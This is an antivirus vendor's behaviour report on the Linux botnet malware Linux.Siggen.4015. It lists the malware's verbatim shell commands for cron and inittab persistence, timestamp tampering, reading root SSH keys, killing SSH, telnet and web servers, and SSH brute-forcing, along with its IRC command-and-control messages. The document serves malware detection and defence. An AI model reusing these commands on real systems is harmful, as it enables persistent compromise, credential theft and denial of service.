マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話

お問い合わせ履歴

電話(英語)

+7 (495) 789-45-86

Profile

Linux.Siggen.4015

Added to the Dr.Web virus database: 2021-06-30

Virus description added:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /var/spool/cron/crontabs/root
  • /etc/inittab
  • /etc/rc.local
Malicious functions:
Gets access to SSH keys
  • /root/.ssh/config
  • /root/.ssh/known_hosts
  • /root/.ssh/id_ed25519.pub
  • /root/.ssh/id_ed25519
  • /root/.ssh/id_ecdsa.pub
  • /root/.ssh/id_ecdsa
  • /root/.ssh/id_rsa.pub
  • /root/.ssh/id_rsa
  • /root/.ssh/id_dsa.pub
  • /root/.ssh/id_dsa
Modifies router settings:
  • /bin/nvram
Stops system services:
  • service httpd stop
  • service telnetd stop
  • service sshd stop
  • systemctl stop httpd.service
  • systemctl stop telnetd.service
  • systemctl stop sshd.service
Launches processes:
  • sh -c touch -acmr /bin/ls <SAMPLE_FULL_PATH>
  • touch -acmr /bin/ls <SAMPLE_FULL_PATH>
  • sh -c (crontab -l | grep -v \"<SAMPLE_FULL_PATH>\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1
  • crontab -l
  • grep -v no cron
  • grep -v <SAMPLE_FULL_PATH>
  • grep -v lesshts/run.sh
  • sh -c echo \"* * * * * <SAMPLE_FULL_PATH> > /dev/null 2>&1 &\" >> /var/run/.x00740882966
  • sh -c crontab /var/run/.x00740882966
  • crontab /var/run/.x00740882966
  • sh -c rm -rf /var/run/.x00740882966
  • rm -rf /var/run/.x00740882966
  • sh -c cat /etc/inittab | grep -v \"<SAMPLE_FULL_PATH>\" > /etc/inittab2
  • cat /etc/inittab
  • sh -c echo \"0:2345:respawn:<SAMPLE_FULL_PATH>\" >> /etc/inittab2
  • sh -c cat /etc/inittab2 > /etc/inittab
  • cat /etc/inittab2
  • sh -c rm -rf /etc/inittab2
  • rm -rf /etc/inittab2
  • sh -c touch -acmr /bin/ls /etc/inittab
  • touch -acmr /bin/ls /etc/inittab
  • sh -c /bin/uname -n
  • sh -c nvram get router_name
  • /bin/uname -n
  • sh -c kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &
  • cat /var/run/httpd.pid
  • sh -c service httpd stop > /dev/null 2>&1 &
  • sh -c killall -9 mini_httpd > /dev/null 2>&1 &
  • sh -c killall -9 minihttpd > /dev/null 2>&1 &
  • sh -c kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &
  • sh -c nvram set httpd_enable=0 > /dev/null 2>&1
  • cat /var/run/thttpd.pid
  • sh -c nvram set http_enable=0 > /dev/null 2>&1
  • sh -c killall -9 httpd > /dev/null 2>&1 &
  • sh -c service telnetd stop > /dev/null 2>&1 &
  • sh -c service sshd stop > /dev/null 2>&1 &
  • sh -c killall -9 telnetd > /dev/null 2>&1 &
  • sh -c killall -9 utelnetd > /dev/null 2>&1 &
  • sh -c killall -9 dropbear > /dev/null 2>&1 &
  • sh -c killall -9 sshd > /dev/null 2>&1 &
  • sh -c killall -9 lighttpd > /dev/null 2>&1 &
  • sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; /etc/init.d/dropbear stop ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 &
  • cat /var/run/dropbear.pid
  • cat /var/run/sshd.pid
  • /etc/init.d/dropbear stop
  • rm -rf /var/run/tt* /tmp/tt*
Attempts to kill system processes:
  • killall -9 mini_httpd
  • killall -9 minihttpd
  • killall -9 httpd
  • killall -9 telnetd
  • killall -9 utelnetd
  • killall -9 dropbear
  • killall -9 sshd
Kills system processes:
  • sshd
Attempts to kill the following processes:
  • killall -9 lighttpd
  • killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear
Performs operations with the file system:
Modifies file access rights:
  • /var/spool/cron/crontabs/tmp.6IaJhv
Creates or modifies files:
  • /var/run/.x00740882966
  • /run/.x00740882966
  • /var/spool/cron/crontabs/tmp.6IaJhv
  • /etc/inittab2
Deletes files:
  • /var/run/.x00740882966
  • /etc/inittab2
  • /var/run/tt*
  • /tmp/tt*
Network activity:
Awaits incoming connections on ports:
  • 127.0.0.1:42076
Attacks using a special dictionary (brute-force technique) via the SSH protocol
Connects to the following servers over the IRC protocol:
  • Server: 66.##8.182.1; Command: NICK Ms|o|0|285802|unknown\nUSER x00 localhost localhost :1.0+tftp_s\n
  • Server: 66.##8.182.1; Command: MODE Ms|o|0|285802|unknown -xi\n
  • Server: 66.##8.182.1; Command: MODE Ms|o|0|285802|unknown +B\n
  • Server: 66.##8.182.1; Command: JOIN #0x00 :777\n
  • Server: 66.##8.182.1; Command: NOTICE bot :\n

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number